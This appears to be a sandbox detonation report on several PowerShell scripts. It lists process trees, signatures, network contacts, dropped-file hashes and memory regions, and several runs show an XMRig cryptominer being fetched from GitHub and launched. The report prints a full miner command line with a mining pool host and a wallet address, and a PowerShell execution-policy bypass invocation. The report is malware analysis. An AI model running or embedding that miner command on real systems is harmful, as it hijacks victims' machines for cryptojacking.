US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 137.71.105.51.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp

Files

memory/1468-3-0x00007FFA60383000-0x00007FFA60384000-memory.dmp

memory/1468-5-0x0000020A48A40000-0x0000020A48A62000-memory.dmp

memory/1468-6-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp

memory/1468-9-0x0000020A48D10000-0x0000020A48D86000-memory.dmp

memory/1468-10-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uhgguzv4.5ar.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/1468-25-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp

memory/1468-48-0x0000020A48AE0000-0x0000020A48AF2000-memory.dmp

memory/1468-61-0x0000020A48AD0000-0x0000020A48ADA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4016-90-0x000002825D4B0000-0x000002825D4D0000-memory.dmp

memory/4016-91-0x00007FF69C610000-0x00007FF69D243000-memory.dmp

memory/1468-92-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp

memory/1468-94-0x00007FFA60383000-0x00007FFA60384000-memory.dmp

memory/4016-93-0x00007FF69C610000-0x00007FF69D243000-memory.dmp

memory/1468-95-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp

memory/1468-96-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp

memory/4016-97-0x00007FF69C610000-0x00007FF69D243000-memory.dmp

memory/4016-98-0x00007FF69C610000-0x00007FF69D243000-memory.dmp

memory/4016-99-0x00007FF69C610000-0x00007FF69D243000-memory.dmp

memory/4016-100-0x00007FF69C610000-0x00007FF69D243000-memory.dmp

memory/4016-101-0x00007FF69C610000-0x00007FF69D243000-memory.dmp

memory/4016-102-0x00007FF69C610000-0x00007FF69D243000-memory.dmp

memory/4016-103-0x00007FF69C610000-0x00007FF69D243000-memory.dmp

memory/4016-104-0x00007FF69C610000-0x00007FF69D243000-memory.dmp

memory/4016-105-0x00007FF69C610000-0x00007FF69D243000-memory.dmp

memory/4016-106-0x00007FF69C610000-0x00007FF69D243000-memory.dmp

memory/4016-107-0x00007FF69C610000-0x00007FF69D243000-memory.dmp

memory/4016-108-0x00007FF69C610000-0x00007FF69D243000-memory.dmp

memory/4016-109-0x00007FF69C610000-0x00007FF69D243000-memory.dmp

memory/4016-110-0x00007FF69C610000-0x00007FF69D243000-memory.dmp

memory/4016-111-0x00007FF69C610000-0x00007FF69D243000-memory.dmp

memory/4016-112-0x00007FF69C610000-0x00007FF69D243000-memory.dmp

memory/4016-113-0x00007FF69C610000-0x00007FF69D243000-memory.dmp

memory/4016-114-0x00007FF69C610000-0x00007FF69D243000-memory.dmp

memory/4016-115-0x00007FF69C610000-0x00007FF69D243000-memory.dmp

memory/4016-116-0x00007FF69C610000-0x00007FF69D243000-memory.dmp

memory/4016-117-0x00007FF69C610000-0x00007FF69D243000-memory.dmp

memory/4016-118-0x00007FF69C610000-0x00007FF69D243000-memory.dmp

memory/4016-119-0x00007FF69C610000-0x00007FF69D243000-memory.dmp

memory/4016-120-0x00007FF69C610000-0x00007FF69D243000-memory.dmp

memory/4016-121-0x00007FF69C610000-0x00007FF69D243000-memory.dmp

memory/4016-122-0x00007FF69C610000-0x00007FF69D243000-memory.dmp

memory/4016-123-0x00007FF69C610000-0x00007FF69D243000-memory.dmp

memory/4016-124-0x00007FF69C610000-0x00007FF69D243000-memory.dmp

memory/4016-125-0x00007FF69C610000-0x00007FF69D243000-memory.dmp

memory/4016-126-0x00007FF69C610000-0x00007FF69D243000-memory.dmp

memory/4016-127-0x00007FF69C610000-0x00007FF69D243000-memory.dmp

memory/4016-128-0x00007FF69C610000-0x00007FF69D243000-memory.dmp

memory/4016-129-0x00007FF69C610000-0x00007FF69D243000-memory.dmp

memory/4016-130-0x00007FF69C610000-0x00007FF69D243000-memory.dmp

memory/4016-131-0x00007FF69C610000-0x00007FF69D243000-memory.dmp

memory/4016-132-0x00007FF69C610000-0x00007FF69D243000-memory.dmp

memory/4016-133-0x00007FF69C610000-0x00007FF69D243000-memory.dmp

memory/4016-134-0x00007FF69C610000-0x00007FF69D243000-memory.dmp

memory/4016-135-0x00007FF69C610000-0x00007FF69D243000-memory.dmp

memory/4016-136-0x00007FF69C610000-0x00007FF69D243000-memory.dmp

memory/4016-137-0x00007FF69C610000-0x00007FF69D243000-memory.dmp

memory/4016-138-0x00007FF69C610000-0x00007FF69D243000-memory.dmp

memory/4016-139-0x00007FF69C610000-0x00007FF69D243000-memory.dmp

memory/4016-140-0x00007FF69C610000-0x00007FF69D243000-memory.dmp

memory/4016-141-0x00007FF69C610000-0x00007FF69D243000-memory.dmp

memory/4016-142-0x00007FF69C610000-0x00007FF69D243000-memory.dmp

memory/4016-143-0x00007FF69C610000-0x00007FF69D243000-memory.dmp

memory/4016-144-0x00007FF69C610000-0x00007FF69D243000-memory.dmp

memory/4016-145-0x00007FF69C610000-0x00007FF69D243000-memory.dmp

memory/4016-146-0x00007FF69C610000-0x00007FF69D243000-memory.dmp

memory/4016-147-0x00007FF69C610000-0x00007FF69D243000-memory.dmp

memory/4016-148-0x00007FF69C610000-0x00007FF69D243000-memory.dmp

memory/4016-149-0x00007FF69C610000-0x00007FF69D243000-memory.dmp

memory/4016-150-0x00007FF69C610000-0x00007FF69D243000-memory.dmp

memory/4016-151-0x00007FF69C610000-0x00007FF69D243000-memory.dmp

memory/4016-152-0x00007FF69C610000-0x00007FF69D243000-memory.dmp

memory/4016-153-0x00007FF69C610000-0x00007FF69D243000-memory.dmp

memory/4016-154-0x00007FF69C610000-0x00007FF69D243000-memory.dmp

memory/4016-155-0x00007FF69C610000-0x00007FF69D243000-memory.dmp

memory/4016-156-0x00007FF69C610000-0x00007FF69D243000-memory.dmp

memory/4016-157-0x00007FF69C610000-0x00007FF69D243000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-01 18:30

Reported

2024-06-10 16:23

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1778s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 138.91.171.81:80 tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 3.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp

Files

memory/404-3-0x00007FFE770D3000-0x00007FFE770D4000-memory.dmp

memory/404-5-0x00000225A3C60000-0x00000225A3C82000-memory.dmp

memory/404-6-0x00007FFE770D0000-0x00007FFE77ABC000-memory.dmp

memory/404-10-0x00007FFE770D0000-0x00007FFE77ABC000-memory.dmp

memory/404-9-0x00000225A3E10000-0x00000225A3E86000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mi4ygcu2.fzs.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/404-26-0x00007FFE770D0000-0x00007FFE77ABC000-memory.dmp

memory/404-49-0x00000225A3DE0000-0x00000225A3DF2000-memory.dmp

memory/404-62-0x00000225A3DB0000-0x00000225A3DBA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2528-91-0x000001F716CF0000-0x000001F716D10000-memory.dmp

memory/2528-92-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/404-93-0x00007FFE770D0000-0x00007FFE77ABC000-memory.dmp

memory/404-95-0x00007FFE770D3000-0x00007FFE770D4000-memory.dmp

memory/2528-94-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/404-96-0x00007FFE770D0000-0x00007FFE77ABC000-memory.dmp

memory/2528-97-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-98-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-99-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-100-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-101-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-102-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-103-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-104-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-105-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-106-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-107-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-108-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-109-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-110-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-111-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-112-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-113-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-114-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-115-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-116-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-117-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-118-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-119-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-120-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-121-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-122-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-123-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-124-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-125-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-126-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-127-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-128-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-129-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-130-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-131-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-132-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-133-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-134-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-135-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-136-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-137-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-138-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-139-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-140-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-141-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-142-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-143-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-144-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-145-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-146-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-147-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-148-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-149-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-150-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-151-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-152-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-153-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-154-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-155-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-156-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

memory/2528-157-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2024-06-01 18:30

Reported

2024-06-10 16:24

Platform

win7-20240221-en

Max time kernel

1556s

Max time network

1561s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"

Network

N/A

Files

memory/1664-4-0x000007FEF5F5E000-0x000007FEF5F5F000-memory.dmp

memory/1664-5-0x000000001B3B0000-0x000000001B692000-memory.dmp

memory/1664-6-0x0000000002310000-0x0000000002318000-memory.dmp

memory/1664-7-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

memory/1664-8-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

memory/1664-9-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

memory/1664-10-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

memory/1664-11-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

memory/1664-12-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

Analysis: behavioral19

Detonation Overview

Submitted

2024-06-01 18:30

Reported

2024-06-10 16:41

Platform

win10v2004-20240508-en

Max time kernel

1662s

Max time network

1671s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 52.111.227.14:443 tcp

Files

memory/4220-0-0x00007FFB278C3000-0x00007FFB278C5000-memory.dmp

memory/4220-1-0x0000018758790000-0x00000187587B2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_m2a55eua.0b5.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4220-11-0x00007FFB278C0000-0x00007FFB28381000-memory.dmp

memory/4220-12-0x00007FFB278C0000-0x00007FFB28381000-memory.dmp

memory/4220-13-0x00007FFB278C0000-0x00007FFB28381000-memory.dmp

memory/4220-14-0x00007FFB278C0000-0x00007FFB28381000-memory.dmp

memory/4220-15-0x00007FFB278C0000-0x00007FFB28381000-memory.dmp

memory/4220-16-0x00007FFB278C3000-0x00007FFB278C5000-memory.dmp

memory/4220-17-0x00007FFB278C0000-0x00007FFB28381000-memory.dmp

memory/4220-18-0x00007FFB278C0000-0x00007FFB28381000-memory.dmp

Analysis: behavioral30

Detonation Overview

Submitted

2024-06-01 18:30

Reported

2024-06-10 16:48

Platform

win10-20240404-en

Max time kernel

1797s

Max time network

1796s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 6.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

memory/3152-3-0x00007FFC012B3000-0x00007FFC012B4000-memory.dmp

memory/3152-5-0x0000011D3BEB0000-0x0000011D3BED2000-memory.dmp

memory/3152-7-0x00007FFC012B0000-0x00007FFC01C9C000-memory.dmp

memory/3152-9-0x0000011D3C060000-0x0000011D3C0D6000-memory.dmp

memory/3152-10-0x00007FFC012B0000-0x00007FFC01C9C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xymowxz0.cfe.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/3152-26-0x00007FFC012B0000-0x00007FFC01C9C000-memory.dmp

memory/3152-49-0x0000011D3C0E0000-0x0000011D3C0F2000-memory.dmp

memory/3152-62-0x0000011D3C040000-0x0000011D3C04A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4316-91-0x000002A746F30000-0x000002A746F50000-memory.dmp

memory/4316-92-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-93-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/3152-94-0x00007FFC012B0000-0x00007FFC01C9C000-memory.dmp

memory/3152-95-0x00007FFC012B3000-0x00007FFC012B4000-memory.dmp

memory/3152-96-0x00007FFC012B0000-0x00007FFC01C9C000-memory.dmp

memory/4316-97-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-98-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-99-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-100-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-101-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-102-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-103-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-104-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-105-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-106-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

